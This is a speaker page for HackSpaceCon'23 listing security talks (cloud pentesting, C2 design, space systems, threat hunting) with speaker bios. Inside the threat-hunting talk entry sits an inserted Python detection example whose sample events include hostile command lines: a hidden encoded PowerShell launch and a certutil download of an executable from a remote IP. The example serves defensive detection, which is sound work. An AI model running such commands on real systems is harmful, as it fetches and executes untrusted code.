HACKSPACECON'23 Speakers
On-Site (In-Person) | 1 Hour Talks
Speakers
The talks will be included in the general admission conference tickets. The talks are 1 hour each and will take place on April 12 from 8am - 5pm. The talk topics will focus on cybersecurity, AI, cloud, offensive, defensive, incident response, insider threats, space and aero defense.
Speakers, new tracks and talk updates will be released on social media leading up to the event.
Speakers Index
Carlos Polop
Dominic Cunningham
Cloud Pentest Apocalypse
Beau Bullock, Senior Security Analyst, Black Hills Security
Talk Description:
When the cloud pentest apocalypse comes, what vulnerabilities will have been exploited? With the emergence of cloud technologies many organizations have opted to move resources from on-prem to the cloud. Cloud environments present new and unique vulnerability possibilities. Without a solid understanding of the attack surface, a greater potential for misconfiguration arises. Cloud resources can be exposed publicly, access policies can be inconsistent, services get configured with hardcoded credentials, and more. This talk will help you doomsday prep by highlighting 10 of the most common issues we are finding on cloud penetration tests so you survive the coming apocalypse.
Speaker Bio:
Beau Bullock is a Senior Security Analyst and Penetration Tester and has been with Black Hills Information Security (BHIS) since 2014. Beau has a multitude of security certifications and maintains his extensive skills by routinely taking training, learning as much as he can from his peers, and researching topics that he lacks knowledge in. His favorite part of being at BHIS is having the opportunity to learn more, and the other amazingly talented people who work around him. He is a constant contributor to the infosec community by authoring open-source tools, writing blogs, speaking at conferences and on webcasts, and teaching his online class, Breaching the Cloud. Outside of his time at BHIS, Beau enjoys staying fit, gaming with his kids, playing guitar, and releasing music under the name NOBANDWIDTH.
Certifications:
OSCP: Offensive Security Certified Professional
OSWP: Offensive Security Wireless Professional
GXPN: GIAC Exploit Researcher and Advanced Penetration Tester
GPEN: GIAC Penetration Tester
GCIH: GIAC Certified Incident Handler
GCFA: GIAC Certified Forensic Analyst
GSEC: GIAC Security Essentials
GCIA: GIAC Certified Intrusion Analyst
GWAPT: GIAC Web Application Penetration Tester
BBOT (Bighuge BLS OSINT Tool) is an OSINT framework by hackers for hackers.
TheTechromancer, Hacker, Black Lantern Security
Talk Description:
This talk will tell the story of how we at Black Lantern Security got tired of the tedious process of running so many different tools, and set out to make OSINT fun again by creating one tool to rule them all. BBOT is written in Python. It is modular (with over 50 modules) and designed to automate the entire OSINT process and beyond -- from subdomain enumeration, to port scanning, to web screenshots, to vulnerability discovery, and more. There will be demos!
Speaker Bio:
TheTechromancer is a hacker at Black Lantern Security. When he's not pentesting, he enjoys writing hacking tools in Python, and speaking about them at conferences. He is an avid believer in open source software, and by the way he runs Arch Linux. He remains largely absent from the social media scene except on Github and ArtStation. He has some certifications, but asks that you judge him not by the color of his certs, but by the content of his Github profile. When provoked, he is likely to rant about Microsoft. Despite all these things he's actually a pretty friendly person.
The Power of Smartphone Forensics: Investigating an Extension of Ourselves
Katrina Khanta, Cyber Security Researcher
Talk Description:
Are you curious about the Internet of Things (IoT) technology that we interact with every day? Let's examine smartphones! This conference talk is on smartphone forensics, showcasing the digital forensic research performed by Katrina after purchasing three previously used and wiped devices from a popular eCommerce website. Get ready for an insightful deep dive into the data extracted from the following devices: an Apple iPhone, a Samsung Galaxy, and a Google Pixel.
The talk will start with an overview of the importance of smartphone forensics in today's digital world and its role in investigations related to criminal and civil cases. Katrina will then delve into the technical details of data extraction and analysis, discussing the various challenges and limitations that come with the process. Throughout the talk, the speaker will showcase real-life examples of how smartphone forensics has been used to crack cases and uncover vital information. They will also discuss the ethical and legal considerations surrounding the use of smartphone forensics in investigations. By the end of the talk, attendees will have a better understanding of the power of smartphone forensics and its potential impact in solving crimes and bringing justice to victims.
Stick around after the presentation to ask additional questions, learn more about how to kick start your career in DFIR, and/or gain insight on leveraging your current skill sets to transition to a career in tech.
Speaker Bio:
Katrina Khanta is a cybersecurity industry professional and conference speaker who transitioned her career from combating human trafficking to bolstering cybersecurity at major organizations through Digital Forensics and Incident Response (DFIR). Katrina is an avid supporter of people who are in the process of transitioning their careers to a tech-related role. She aims to inspire and frequently encourages others by sharing resources that have helped her to succeed.
She is currently balancing her career in DFIR while being a full-time graduate student pursuing a Doctorate of Science (D.Sc.) in Cybersecurity at Marymount University. Having worked as a Protector of Magic at The Walt Disney Company, she became immersed in the fast-paced realm of broadcast systems engineering and technology, developing solutions to mitigate impact, and performing investigations on major incidents.
Katrina is a member of the Hack Red Con advisory board, bringing a well-rounded perspective and a commitment to fulfilling her endless curiosity to the community. #Curiosity&Coffee
Cyber Kill Chains in the Space Domain
Ronald Broberg, Penetration Test and Security Assessments (currently focused on UAV systems), Dark Wolf Solutions
Talk Description:
1. Introduction to Cyber Kill Chains
2. Description of generic satellite system to include: ground systems (mission ops center, payload control center), comms system, and space system (flight control and payload control).
3. Scenario-based intrusion mapped to the CKC, to include MOC intrusion, retrieval of comm keys, intrusion of comms to include access to the flight controller, retrieval of PCC keys, access to the payload controller and retrieval of payload data. Each step of the (simulated) intrusion will be accompanied by a video or live demonstration against emulated systems built with open source software.
4. Maturing cybersecurity in the space domain
Speaker Bio:
Penetration Tester, Dark Wolf Solutions
Software Engineer, Lockheed Martin: Software Development, Requirements Analysis, Cybersecurity Data Analysis, Penetration Testing
TBD - Threat Analysis 2023, CISA Tools
Klint Walker, Cybersecurity Advisor, Cybersecurity and Infrastructure Security Agency, U.S. DHS
Talk Description:
TBD
Speaker Bio:
Klint Walker is the Cyber Security Advisor for Region IV, which covers Alabama, Florida, Georgia, Kentucky, Mississippi, North Carolina, South Carolina, and Tennessee. As the CSA, Klint is the liaison between Federal services and State, Local, Territorial and Tribal Governments, Critical Infrastructure and Private Industry. He serves as the focal point for communications to promote cyber preparedness, incident response, risk mitigation and situational awareness. He provides direct coordination, outreach, and regional support in order to protect cyber components essential to the sustainability, preparedness, and protection of the Nation’s Critical Infrastructure and Key Resources (CIKR) and State, Local, Territorial, and Tribal (SLTT) governments. Mr. Walker has previously held positions as an Information Systems Security Officer for the Department of Health and Human Services, where he assisted in establishing the Computer Security Incident Response Center (CSIRC). Mr. Walker also held the position of Chief Information Security Officer for the National Air and Space Intelligence Center (NASIC). In this role he was responsible for the operational resiliency of classified networks and facilities in adherence with DoD standards and guidelines.
TBD Data and Privacy
Kelli Tarala, Founder, Owner, and Principal Researcher
Enclave Security and AuditScripts
SANS Instructor
Talk Description:
TBD
Speaker Bio:
An Open Letter to Infosec: Beaming your skill set to the next level
Charles Shirer, CEO Global Wave Consulting, Pentester, Senior RedTeamer
Talk Description:
TBD
Speaker Bio:
Charles has 20 years of overall experience and has done systems administration, penetration testing, development, security research, threat hunting and red teaming. In his spare time Charles plays retro video games, codes in the Rust programming language, works on the SECBSD open-source project (a penetration testing distro based on the OpenBSD operating system), works on a podcast and has a passion for helping people.
Cracking the Cyber Security Job Code
Joe Brinkley, Director of Offensive Security Innovation, Research and Advanced Testing at OnDefend
Talk Description:
In this talk we will discuss an Introduction to Cyber Security, Recon for the job AKA Finding a Job in Cyber Security, Interviewing TIPS for a Cybersecurity Job, Initial Access aka Getting the Job, Escalation of Duties: AKA Getting Promotions, Long Term Persistence, a small guide on some investing ideas and making sure you don't work forever and more.
Speaker Bio:
Insightful, results-driven IT professional with extensive knowledge of industry-leading security standards and the use of the latest and greatest IT security practices. Proven track record with 10 years of results leading to a successful track record. Comprehensive analytic skills; keen eye for details. Ability to plan, design, and implement security solutions for clients. Outstanding track record of identifying risks and managing disasters for a diverse set of clientele including private and federal contracts. Increased computer protection through new programs implemented from trained staff. Able to work in diverse surroundings; alone and in group settings. Ability to serve in both leadership and subordinate roles. Excellent written and verbal communication skills. Able to build successful rapport with coworkers, employees, and clientele.
The Intelligence Value of Russian Data Dumps, Part 2
Wally Prather, Independent Intelligence Professional
Talk Description:
A talk designed to inform the attendees of the complexity, interconnections, and intelligence value of Russian data dumps (Part 2). This talk will show the data dumps individually and the interpersonal connections between groups of individuals, utilizing intelligence methodologies. Data dumps show us the inner workings, likes, dislikes, future plans, and internal conversations that were never meant to be public. Since HackRedCon Beta our community's understanding of Russian cyber, economic, military, government, media, and social dynamics has increased dramatically. From the beginning of the war in Ukraine a minimum of 3 TB of data was hacked from Russia; currently there are nearly 6 TB of new data. This talk will cover the newest data and previously unbriefed data dumps and their impressive intelligence value.
Speaker Bio:
Jon “Wally” Prather is a seasoned intelligence professional with a wide range of subject matter expertise who, at the time of writing, is independently researching intelligence-related topics and pursuing new career options. Wally is proficient in multiple intelligence disciplines including HUMINT Targeting, HVI Targeteer, and Network Analysis with 20 years’ experience, primarily in maritime counterterrorism/counterinsurgency operations with the US Marine Corps, Special Operations, and Irregular Warfare. Wally has operational experience providing in-depth intelligence analysis and direct support to combat and interagency operations in the Middle East, Southeast Asia, and Africa, with over four years deployed to combat, hostile and sensitive environments including East Africa, Afghanistan, and Iraq. Wally now applies intelligence processes and methodologies to cyber data with unique and innovative results.
Satellite Systems Hacking - Specific Topic TBD
Gregory Carpenter, Chief Security Officer at KnowledgeBridge International Inc.
Talk Description:
TBD
Speaker Bio:
Gregory Carpenter is Chief Security Officer of Knowledge Bridge International. He is a Fellow at the Royal Society for the Arts and was selected the National Security Agency’s Operations Officer of the Year in 2007. He serves on the Board of Directors for ATNA Systems, is a Senior Advisor for ARIC, Inc., and previously sat on the Board of Advisors for EC-Council University and the International Board of Advisors for the Mackenzie Institute. He is a retired military officer of 27 years and has held numerous senior positions in government and private business. Gregory holds a Bachelor of Science degree, a Master of Science degree, and a Doctorate in Public Health. He is a Certified Information Security Manager and ISO-9000 lead auditor.
Supply Chain Cybersecurity: What it is and Why it Matters
Colin Glover, Cyber Security Advisor, Cybersecurity and Infrastructure Security Agency, Department of Homeland Security
Talk Description:
From cell phones to cloud storage to satellite connectivity, the ICT supply chain encompasses the entire life cycle of hardware, software, and services and a diverse array of entities—including third-party vendors, suppliers, service providers, and end users. However, the globally distributed and interconnected nature of ICT also means that compromise of vulnerabilities in the supply chain can have cascading impacts across multiple critical infrastructure sectors. Through case studies and published methodologies, you will learn best practices for protecting your organization from supply chain attacks whether you are a developer, supplier or end user.
Speaker Bio:
Colin Glover spent the past 15 years working in the military and in the federal government on National Security matters. In August 2015, he completed his Master's Degree in Mechanical and Aerospace Engineering. He is seeking to transition to an engineering or data science position with the government or in industry.
Hack every team in your company: Learn to use an offensive security mindset to threat model business
David Girvin, Security Engineer
Talk Description:
We will do a deep dive into threat modeling from an offensive security point of view to show how diversity of thought can benefit every single team in a company. Hacking is not just for security anymore. An offensive mindset and strong threat modeling will show you weaknesses and strengths for every team, deal or plan your company is working on. Let’s look at why hackers who have moved to business have been so successful and why you should hire them.
Speaker Bio:
From commercial pilot and ship captain to owning a fabrication and industrial solutions company, with some weird jobs in between, he learned a lot about people and problem solving. He came into tech in his mid thirties, straight into security. He has a love for offensive security and social engineering. He is hoping to help change security culture on both ends, from the engineer to the board, with a massive emphasis on servant leadership and raising up the people around him.
TBD
Tyler Robinson, Managing Director of Offensive Security & Research at Trimarc
Talk Description:
TBD
Speaker Bio:
With over 2 decades of experience, Tyler Robinson, Founder of Dark Element, specializes in Red Teaming, APT threat modeling, blackbox network penetration testing, and Physical/Social-Engineering. Tyler has presented at multiple conferences including BSides, DefCon and Blackhat panels, SANS security events and to multiple branches of the military, in addition to helping teach the DarkSide-Ops and Accessing & Exploiting ICS classes at Blackhat. Tyler has helped the development of world class offensive security capabilities, strategy, and programs of Offensive services at several incredible companies such as Silent Break Security, InGuardians, Inc., Nisos, and now Trimarc, directly shaping Offensive operations and research. Currently, as Managing Director of Offensive Security & Research at Trimarc, Tyler leads a team of high performance security professionals within the offensive security field by simulating sophisticated adversaries and creating scalable offensive security platforms using the latest techniques as seen in the wild.
Testing the Space Force: A look at modern targets in the DoD's newest branch
Tyler Fordham, Director, Penetration Testing and Cybersecurity
Talk Description:
Dark Wolf Solutions has had the opportunity to conduct a wide range of assessments against Space Force systems, many of which don't look much different from what you'd expect from modern commercial technology stacks! In this talk, Tyler will detail some of the broader implications of cybersecurity in the Space Force landscape, detail some of the work they've done and muse over where things will evolve from here.
Speaker Bio:
An Air Force veteran who's done everything from blue team operations for DoD cyber protection teams to OCONUS offensive security operations in the Middle East, and now leads Dark Wolf's penetration testing practice. Tyler's spent the last decade navigating the battle between intelligence, cyberspace and the countless branching factors that make it a hard space for our warfighters to solve. A nerd at heart like the rest of the folks in this industry, he might beat you in Smash Bros. or Pokémon when you aren't talking cyber.
Breakdown of a Cybercrime Take Down: "Diary of a Black Hat"
GhostExodus, Founder of Electronik Tribulation Army
Talk Description:
The aim of the talk is to offer a descriptive explanation of the many elements of an FBI takedown against a cyber criminal. Using the speaker's own experience as a former threat actor on the other side of the law, the speaker hopes to flesh out every step that transpires leading to a criminal conviction of a cybercrime, and how law enforcement accomplished this in their own case.
The topic cannot be discussed without an explanation on how cybercrimes are treated in a unique fashion and subject to antedated cybercrime laws which makes understanding or interpreting them difficult. This will include how information delegated by DOJ Press releases can be unwittingly misinterpreted and misrepresented by the media in a harmful way.
The speaker will also include their first-hand experiences in jail, and eventually prison, and how continuing the hacker's mindset gave them an advantage in a place without computer or internet access. After spending 11 years removed from the sociological and technological evolution taking place across the world, the speaker stepped out into a world they no longer recognized.
Speaker Bio:
GhostExodus is a former black hat computer hacker and insider threat. He is also the founder and leader of the hacking collective known as the Electronik Tribulation Army. In 2009, he was arrested for installing malicious code on healthcare systems. Upon conviction, he became the first person in recent US history to be convicted for corrupting industrial control systems and ultimately served nearly 11 years in federal prison.
As a two-time fugitive, GhostExodus attempted to flee the country. He broke into a US Customs-controlled shipyard and blackmailed the captain of a cargo ship into taking him to Nigeria after discovering that they were disabling their AIS tracking beacon while in international waters.
Currently, GhostExodus works as chief cybersecurity writer for ORNA, and freelances for BeIncrypto and Forklog Media. He uses his experiences as a former threat actor and hacker to bring awareness to security risks.
.NET – An APT’s Best Friend
Anthony "Coin" Rose
Jake "Hubble" Krasnov
Talk Description:
The .NET framework has become an increasingly popular choice among Advanced Persistent Threat (APT) groups for developing and deploying malware. This talk will provide a comprehensive overview of the current state of .NET usage by APTs, including a review of known APT campaigns utilizing .NET and a deep dive into the analysis of common .NET-based tools and tactics employed by these groups. The presentation will also cover the unique challenges posed by .NET-based APT attacks, including the ability to evade traditional security controls. Attendees of this talk will gain a deeper understanding of the .NET threat landscape, and will come away with the knowledge and tools needed to defend their organizations against .NET-based APT attacks.
Speaker Bios:
Anthony "Coin" Rose, CISSP, is a PhD Student at the Air Force Institute of Technology and Lead Security Researcher at BC Security, where he specializes in adversary tactic emulation planning, Red and Blue Team operations, and embedded systems security. He has presented at numerous security conferences, including Black Hat, DEF CON, HackMiami, and RSA conferences. Anthony is the author of various offensive security tools, including Empire and Starkiller, which he actively develops and maintains. He is recognized for his work revealing widespread vulnerabilities in Bluetooth devices and is the co-author of a cybersecurity blog at https://www.bc-security.org/blog/.
Jake "Hubble" Krasnov is the Red Team Operations Lead and Chief Executive Officer of BC Security. He has spent the first half of his career as an Astronautical Engineer overseeing rocket modifications for the Air Force. He then moved into offensive security, running operational cyber testing for fighter aircraft and operating on a red team. Jake has presented at DEF CON, where he taught courses on offensive PowerShell and has been recognized by Microsoft for his discovery of a vulnerability in AMSI. Jake has authored numerous tools, including Invoke-PrintDemon and Invoke-ZeroLogon, and is the co-author of a cybersecurity blog at https://www.bc-security.org/blog/.
C2 Connoisseuring: How to Turn Anything into a Masterful C2 System
Dahvid Schloss
Ross Flynn
Talk Description:
Are you tired of using the same old, tedious command and control systems? Wish you had something custom that wasn't completely fingerprinted by every AV/EDR in the book? Does this read like an infomercial where someone is trying to hold like 1000 Cheetos in their arms like some kind of maniac? You bet it does, so look no further!
In this talk, two cyber idiots will take you on a journey of turning mostly anything you want into a unique and potentially stealthy C2. From household items to cutting-edge technologies, you'll learn how to turn anything into a powerful C2 system that will leave your blue teams in the dark. We'll cover everything you need to know to become a C2 connoisseur, including:
- Understanding the basics of command and control systems
- How to identify potential C2 systems in everyday objects
- Techniques for turning anything into a C2 system
- Creative approaches to C2 design and implementation
- Best practices for developing and deploying unconventional C2 systems
Whether you're a seasoned ethical hacker or just starting out, come join these two idiots as they dispel the myth that you need to be 1337 to develop a good C2.
Speaker Bios:
Dahvid is the Managing Lead, Offensive Security at Echelon. As an experienced cybersecurity leader with over 12 years of cyber-attack and defense experience, Dahvid has previously worked as a Red Team Operator with a Big 4 consulting firm leading and conducting Adversarial Emulation (red team) exercises as well as served in the military, leading, conducting, and advising on special operations offensive cyber operations. He has a wide background in cybersecurity including logical, social, and physical exploitation as well as incident response and system/network device hardening. Dahvid is also a Malware Development Instructor, growing Adversarial Emulation knowledge to those looking to expand their skills in the highly specialized space.
Ross is a husband, musician, escape room expert, and hot sauce connoisseur who happens to love his job as a Cybersecurity consultant. Prior to his career in Infosec, Ross was a family preservation counselor in the social services field where he helped families involved in the Child Welfare system identify strengths, develop healthy boundaries, and ensure a safe environment for their children. After a major career switch, he started down the path of ethical hacking, risk management, and business continuity. On a normal day you might find Ross performing a penetration test, conducting an incident response tabletop exercise, writing disaster recovery plans, or performing NIST, PCI, or Maturity assessments.
Controlled Flight into Terrain: How [NOT] to Succeed at Cybersecurity Startups
Georgia Weidman
Talk Description:
Have you ever gotten off the plane at BlackHat or RSA and seen the security vendor ads lining the corridors? Or made your way through a crowded vendor hall with the multistory booths larger and more elaborate than a typical city apartment and thought to yourself, that could be me? Then this talk is for you. Are you ready to never work again and enter the privileged world of successful entrepreneurs permanently on vacation? Just kidding! Are you ready to work so hard any potential reward will come out to well below minimum wage when you calculate the hours, blood/sweat/tears, and mental health crises that went into it? Then maybe it is time to start a cybersecurity startup. In this talk we will take a dive into the exciting world of turning your hacking tool into a successful product company and how to avoid the common pitfalls encountered by the speaker and her merry band of startup world survivors. We will cover exciting topics such as venture capital funding, startup accelerators, and making your first sale. We will also discuss not as exciting but equally important topics as corporate structures, hiring a CEO, and board meetings. Filled with info and direct quotes from real security practitioners turned startup founders, venture capital investors, and serial expert advisors, this talk will get you ready to start down the path of your own startup journey, or run screaming in the other direction.
Speaker Bio:
Georgia Weidman is a serial entrepreneur, penetration tester, security researcher, speaker, trainer, and author. Georgia is the author of Penetration Testing: A Hands-On Introduction to Hacking and a contributor to Tribe of Hackers series which collectively have launched the cybersecurity careers of thousands. Her work in the field of smartphone exploitation has been featured internationally in print and on television including ABC, BBC, Fox, NBC, and PBS. She has presented and trained around the world including venues such as Black Hat, DEF CON, NSA, Oxford, RSA, and West Point and has served as a subject matter expert with the CyberWatch Center's National Visiting Committee, the FTC’s Home Inspector IoT security challenge, and as a New America Cybersecurity Policy Fellow.
Georgia founded Bulb Security LLC, a security consulting firm specializing in security assessments, penetration testing, security training, and research and development in mobile and IoT security. She was awarded a DARPA Cyber Fast Track grant to continue this work culminating in the release of the open-source project the Smartphone Pentest Framework. She founded Shevirah Inc. to create products for assessing and managing the risk of mobile and the Internet of Things and evaluating the effectiveness of mobile security solutions. Shevirah is a graduate of the Mach37 cybersecurity accelerator, and, through Mach37, Georgia has served as an advisor, mentor, and occasionally investor in the next generation of cybersecurity startups.
She received the 2015 Women’s Society of CyberJutsu Pentest Ninja award, is an Adjunct Professor at the University of Maryland Global Campus, and holds an MS in computer science; U.S. Patents #10,432,656 and #11,089,044, which are foundational to simulated phishing; as well as CISSP, Pentest+, and OSCP certifications.
Harnessing the Power of Artificial Intelligence in AWS Pentesting
Mike Felch
Talk Description:
With the advancement in artificial intelligence, leveraging its potential during penetration tests can lead to quickly identifying vulnerable attack paths. ChatGPT is an AI model developed by OpenAI, which is trained on massive datasets from the internet. It's capable of receiving input from users and then generating textual results based on the data it's been trained with. Luckily for us, it understands technology, tools, and code very well!
In this presentation, I will demonstrate how adaptive techniques can incorporate the use of ChatGPT while on AWS penetration tests. I will focus on the exploitation, lateral movement, and privilege escalation phases of an engagement to highlight how AI can be incorporated into pentesting tradecraft. Finally, I will open-source a new tool that leverages AI to quickly identify vulnerable attack paths against AWS.
Speaker Bio:
Mike Felch first joined Black Hills Information Security (BHIS) in August 2017. As a Security Researcher, his role is to identify and weaponize security vulnerabilities in emerging technologies. Mike started his career in 1997 as a Linux administrator, which led to numerous offensive security and engineering roles. He chose BHIS because of the value placed on team culture, and he enjoys being part of a company that has the opportunity to make a difference in major organizations worldwide. Outside of work, Mike operates a family ranch where he raises cattle, chickens, and goats.
Breaking into InfoSec
Gregory "mobman" Hanis
Talk Description:
Breaking into InfoSec - highlights of different roles in the industry and where they lead to. Skill sets and tools used. Knowledge and understanding of what is required. Answers the often heard “What languages should I learn over others? What certifications should I pursue?” etc. Plus Q & A from the audience.
Speaker Bio:
Greg has been featured in Rolling Stone and on CBS Miami on various occasions, and in DarkNet Diaries Episode 20. Active in the cyber community since his teenage years in the 90’s, he sponsors and volunteers with CyberPatriot as a way to help aspiring young cyber professionals avoid costly mistakes he knows all too well. He is a patent holder and former start-up entrepreneur nominated for North Alabama's 2017 People's Choice awards for work in intrusion detection methods. Greg gives talks and trainings around the country, sharing his knowledge with the public and private sectors. A former board member of SFISSA (South Florida Information Systems Security Association), he founded and co-leads HACKBAMA to encourage and cultivate local cyber talent. He has competed in many cyber competitions (CTFs).
Info-sec specialist whose qualifications include a degree in computer science and detailed knowledge of security tools, technologies and best practices. Over twenty years of experience in the creation and deployment of solutions protecting networks, systems and information assets for diverse companies and organizations.
Specialties: programming, database, risk management, wireless, networking, world wide web, operating system vulnerabilities, exploitation, forensics, and many more.
Trust, but verify.
David Hunt
Waseem Albaba
Talk Description:
Our defenses are very complex, spanning many technologies and resources in our network. Ideally, we understand the limitations of these defenses, but often they're black boxes we trust to protect us. How can we be sure they're working as intended? We do this by asking questions about our systems and defenses. And we do it continuously, on all our systems, even mission-critical production systems. With the gathered intelligence, we’re able to make decisions that will better harden our defenses.
In this talk, we'll introduce Verified Security Tests (VSTs), a more structured, scale-ready format of the TTP that's designed for security testing at scale. We'll discuss how VSTs can be used for validating the efficacy of defensive technology, and we'll introduce tools to help practitioners develop and deploy VSTs.
Speaker Bios:
David Hunt is the Co-Founder and CTO of Prelude Research Inc. There, he leads a team supporting a cutting-edge autonomous red team platform. Prior to this work, David built CALDERA, an open-source adversary emulation framework, while working as a Principal Cyber Security Engineer for MITRE. David has spent 15 years working as a security consultant for the U.S. Government, along with full-time roles at major cyber security firms, such as FireEye.
Waseem Albaba is an Adversarial Security Engineer working at Prelude Security. He is constantly seeking to expand his professional expertise in Penetration Testing, Red-Teaming, and Purple-Teaming. Waseem is also a passionate cat lover, skateboarder, and global traveler. Through individual projects, competitive CTFs, and work at Prelude he strives to deliver constant value to the information security community. Alongside that, he is determined to immerse himself in every part of cyberspace to improve himself while also supporting his close friends and coworkers along the way.
Certifications: OSCP (Offensive Security Certified Professional), CBBH (Certified Bug Bounty Hunter), CompTIA Security+
Hook, Line, & Cyber: A Fisherman’s Guide to Building a Security Operations Center
Nick Gipson, Founder/CEO, Gipson Cyber
Talk Description:
A robust Security Operations Center (SOC) is essential for protecting an organization from cyber threats. This paper presents a guide for building an effective SOC, using the metaphor of fishing to illustrate key concepts. The presentation discusses the importance of understanding the "ocean" of potential threats and having the right "gear" to catch those threats. It then explores the importance of having a "fishing net" or a well-defined incident response plan. The presentation also covers the importance of "reeling in" and analyzing data and the importance of "cleaning and storing" data for future reference. Finally, the presentation examines the importance of having a "skilled fisherman" or experienced security analyst and "sharing catches" or information sharing with other organizations. Overall, this presentation is intended to help organizations build an effective SOC that can secure them from cyber threats, just as a skilled fisherman can secure their catch.
Speaker Bio:
Nick Gipson is a highly experienced professional with over seven years in the fields of Security and Technology. Throughout his career, he has led forensics teams for the US Central Command as well as multiple private sector organizations. In addition, Nick has built a total of four Security Operations Centers (SOCs) for a variety of organizations, including US Cyber Command. Prior to that, Nick had a six-year career as an Army Reconnaissance Soldier.
Certs: GCFA, CISSP
Thrunting 101
Jason Killam
Talk Description:
We're gonna talk about the basics of "thrunting" otherwise known as threat hunting, or the process of searching for "unknown evil" that your existing alerts may be missing.
How does one thrunt? My talk will cover the steps necessary to conduct threat hunting, going from hypothesis to searching and finishing with detection rules so that, going forward, we catch the evil we find along the way.
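As an added example (not part of the talk or the speaker's material), here is the hypothesis, search, detection-rule loop the description above sketches, run in Python over a handful of constructed process-creation events. The hypotheses, host names, command lines and the docsign.exe allowlist entry are all assumptions made up for the illustration:

```python
"""Hypothesis-driven hunt over constructed process-creation telemetry, then
promotion of what the hunt found into reusable detection rules.
Added example; the events and hypotheses below are constructed, not real data."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    host: str
    parent: str
    image: str
    cmdline: str


# Constructed sample telemetry standing in for a process-creation feed
# (Sysmon event 1, EDR process events, etc.).
EVENTS = [
    ProcessEvent("ws01", "explorer.exe", "chrome.exe", "chrome.exe --profile-directory=Default"),
    ProcessEvent("ws02", "WINWORD.EXE", "powershell.exe",
                 "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    ProcessEvent("ws03", "svchost.exe", "powershell.exe", "powershell.exe -File C:\\scripts\\inventory.ps1"),
    ProcessEvent("ws04", "EXCEL.EXE", "cmd.exe",
                 "cmd.exe /c certutil -urlcache -split -f http://198.51.100.7/a.txt a.exe"),
    ProcessEvent("ws05", "explorer.exe", "powershell.exe",
                 "powershell.exe -NoProfile -ExecutionPolicy Bypass -File build.ps1"),
    ProcessEvent("ws06", "WINWORD.EXE", "cmd.exe",
                 "cmd.exe /c \"C:\\Program Files\\Corp\\docsign.exe\" --sign"),
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
INTERPRETERS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# -e / -ec / -en / -enc / -EncodedCommand followed by a long base64 blob.
ENCODED_PS = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.IGNORECASE)

# Step 1: hypotheses. Each is a question we can ask of the whole data set.
HYPOTHESES = {
    "office_spawns_interpreter":
        lambda e: e.parent.lower() in OFFICE_PARENTS and e.image.lower() in INTERPRETERS,
    "encoded_powershell":
        lambda e: e.image.lower() == "powershell.exe" and ENCODED_PS.search(e.cmdline) is not None,
    "certutil_download":
        lambda e: "certutil" in e.cmdline.lower() and "-urlcache" in e.cmdline.lower(),
}


def hunt(events, hypothesis):
    """Step 2: search. Return every event matching the hypothesis, for analyst triage."""
    predicate = HYPOTHESES[hypothesis]
    return [e for e in events if predicate(e)]


@dataclass(frozen=True)
class Rule:
    name: str
    hypothesis: str            # the hunt this rule was promoted from
    severity: str
    cmdline_exclusions: tuple  # substrings triaged as known-good during the hunt


def run_rules(events, rules):
    """Step 3: detection. Apply the promoted rules; returns (rule name, host) pairs."""
    alerts = []
    for rule in rules:
        for e in hunt(events, rule.hypothesis):
            if any(x.lower() in e.cmdline.lower() for x in rule.cmdline_exclusions):
                continue  # known-good, tuned out after the hunt
            alerts.append((rule.name, e.host))
    return alerts


# Rules promoted after the hunt. docsign.exe is a constructed "legitimate Word
# add-in" that triage found on ws06; it is excluded so the rule stays quiet.
RULES = [
    Rule("Office app spawned interpreter", "office_spawns_interpreter", "high", ("docsign.exe",)),
    Rule("Encoded PowerShell command", "encoded_powershell", "medium", ()),
    Rule("certutil used as downloader", "certutil_download", "high", ()),
]

if __name__ == "__main__":
    for name in HYPOTHESES:
        print(name, [e.host for e in hunt(EVENTS, name)])
    print(run_rules(EVENTS, RULES))
```

The point of the split between `hunt` and `run_rules` is the workflow: a hunt is allowed to be noisy and returns everything for a human to triage, while a rule carries the exclusions that triage produced, so the same predicate that found ws02 and ws04 during the hunt no longer fires on the docsign.exe launch from ws06 once it is promoted.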
Speaker Bio:
I'm a detection engineer for Red Canary, former SOC monkey at Jack Henry and Associates, and a Cyber Warfare Operator with the US Air Force, hunting for APTs. I love Lego, long walks on the beach in Illinois/Missouri, playing Halo, and looking at evil processes at my job detectin' evil.
https://redcanary.com/authors/jason-killam/
Make Private Public Sector Stuff Private Again
Janusz Jasinski
Talk Description:
What do festivals, concerts, hospitals and police stations all have in common? They all have places you should not be able to access. It could be backstage, a VIP area, an operating theatre or a morgue. Emphasis on the "should not".
We will focus on hospitals, showing what damage could be done with relatively little effort and seeing what could be done to prevent it. This isn't a FTSE 100 company where the only commodity is money. These are people's lives at risk.
Speaker Bio:
JJ was a developer in the UK for 20 years before joining Counter Hack as a senior technical engineer in February of this year. He mostly stayed in the public sector but also did work for live music promoters. This is where his curiosity got the better of him; opening doors, pressing buttons and flicking switches he had no business touching.
He loves breaking and fixing stuff but not necessarily in that order.
Privacy at Risk: The Dangers of PII/PHI in Rental/Lease Cars Left Behind
Chris "BLu3f0x" Huffstetler
Talk Description:
Employers sometimes offer leased or rental cars to their employees, providing them with a convenient means of transportation. However, these vehicles can also be equipped with radios that require access to your phone and can gather personally identifiable information (PII) such as names, addresses, and credit card numbers, and possibly protected health information (PHI) as well. Drivers can also easily leave unsecured hard copies of the same PII and PHI. This poses significant risks to the privacy of lease and rental car users, especially if the information is not removed when the lease period is over or the rental is returned. In this talk, we explore the ways in which PII and/or PHI can be exposed through lease and rental cars, the potential consequences of this exposure, and what steps employers and users can take to protect their privacy.
Speaker Bio:
Chris "BLu3f0x" Huffstetler is a Cyber Security Consultant and Application Penetration Tester and has been with CGI Federal since December 2022. Chris has experience in network and communication security starting back in 1998 with the North Carolina National Guard, then transferred to active duty for 7 more years in the U.S. Army. Afterwards, Chris spent several years in DoD and DoS contracting focused on network and radio communication security. After a brief period of exploring law enforcement, Chris then went to HackMiami, where he was immersed in Cyber Security, and since then hasn't stopped learning and sharing, speaking at HackMiami, BSides Puerto Rico, and OWASP Tampa. When not at work, he helps other non-profit organizations with cyber security events, builds Lego sets and takes the occasional gaze at the stars through the telescope with his daughter.
Red Team 2.0: Adapting Traditional Red Team to Cloud (AWS) Red Team
